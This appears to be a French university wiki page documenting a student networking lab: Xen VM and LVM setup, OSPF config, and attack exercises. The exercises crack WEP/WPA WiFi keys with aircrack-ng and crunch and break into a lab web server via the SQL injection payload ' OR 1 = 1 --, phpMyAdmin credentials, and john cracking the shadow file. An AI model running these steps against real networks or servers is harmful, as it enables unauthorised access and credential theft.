TP sysres IMA5sc 2020/2021 G11 : Différence entre versions
(→Configuration LVM) |
|||
Ligne 36 : | Ligne 36 : | ||
vgcreate storage /dev/sde /dev/sdf | vgcreate storage /dev/sde /dev/sdf | ||
− | On obtient bien un groupe de 5. | + | On obtient bien un groupe de 5.46 Tb : |
root@capbreton:~# vgdisplay storage | root@capbreton:~# vgdisplay storage | ||
--- Volume group --- | --- Volume group --- |
Version du 30 novembre 2020 à 16:41
Sébastien DARDENNE - Corto CALLERISA
Sommaire
Adressage
Groupe | Domaine | Distribution | IP (privée) | IP (publique) | VLAN | IPV4 | IPV4 6509-E | IPV4 C9200 | IPV4 Routeur | IPV6 |
---|---|---|---|---|---|---|---|---|---|---|
Groupe 11 | stropharia.site | Debian 10 Buster | 100.64.0.18 | 193.48.57.178 | 311 | 10.60.111.0/24 | 10.60.111.1 | 10.60.111.2 | 10.60.111.254 | 2001:660:4401:60bd::0/64 |
Mise en place de la machine virtuelle Xen
Creation de la VM
Après nous être connecté sur le serveur capbreton.plil.fr, nous créons la machine virtuelle du TP avec la commande :
root@capbreton:~# xen-create-image --hostname=stropharia --password=pasglop --ip=100.64.0.18 --gateway=100.64.0.5 --netmask=255.255.255.0 --dir=/usr/local/xen --dist=buster
Cette commande spécifie les information de connexion à la VM ainsi que des informations réseau et la dernière version de Debian : Buster
Configuration LVM
Les disques de capbreton ont été initialisé pour l'utilisation avec LVM :
pvcreate /dev/sde pvcreate /dev/sdf
Ces disques sont ensuite rassemblés dans le volume groupe storage :
vgcreate storage /dev/sde /dev/sdf
On obtient bien un groupe de 5.46 Tb :
root@capbreton:~# vgdisplay storage --- Volume group --- VG Name storage System ID Format lvm2 Metadata Areas 2 Metadata Sequence No 59 VG Access read/write VG Status resizable MAX LV 0 Cur LV 38 Open LV 37 Max PV 0 Cur PV 2 Act PV 2 VG Size <5.46 TiB PE Size 4.00 MiB Total PE 1430526 Alloc PE / Size 69632 / 272.00 GiB Free PE / Size 1360894 / 5.19 TiB VG UUID eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc
On peut alors lancer la VM et s'y connecter :
xl create -c /etc/xen/stropharia.cfg xen console stropharia
5.1
5.2 Cassage de clef WEP d’un point d’accès WiFi
Voir la liste des interfaces
airmon-ng
On passe notre interface en mode monitor
airmon-ng start wlx40a5efd2140c
On lance un scran des réseaux wifi
airmon-ng --encrypt wep wlan0mon
On capture les paquets
airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon
On lance le crack de la clé
aircrack-ng -z crack11-01.cap
KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]
5.3
Voir la liste des interfaces
airmon-ng
On passe notre interface en mode monitor
airmon-ng start wlx40a5efd2140c
On regarde les réseaux pour avoir le BSSID
airodump-ng wlan0mon
On lance la commande capture sur le channel 5 et on attend le handshake
airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A
Pendant ce temps-là, nous créons le dictionnaire pour le brutforce
crunch 8 8 0123456789 > dictionnaire.txt
Pour gagner du temps, nous divisions ce dictionnaire en 4 parties
split -l 25000000 dictionnaire.txt dictionnairediv.txt
On lance le brutforce sur plusieurs machine en fonction
aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap
5.4
5.5 Intrusion sur un serveur d’application Web
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:
' OR 1 = 1 --
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:
nmap -T4 -A honey.plil.info
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.
Je lance donc la commande suivante:
john --wordlist=dictionnaire password.txt unshadow.txt > output.txt
Mdp trouvé et connexion en root(Groupe11):
Configuration OSPF sur 9200
router ospf 1 router-id 10.60.0.2 log-adjacency-changes summary-address 193.48.57.176 255.255.255.240 summary-address 100.60.0.0 255.240.0.0 not-advertise summary-address 10.0.0.0 255.0.0.0 not-advertise redistribute connected subnets redistribute static subnets route-map ospf network 192.168.222.8 0.0.0.7 area 2
Création de la VM
SSH sur capbreton
xen-create-image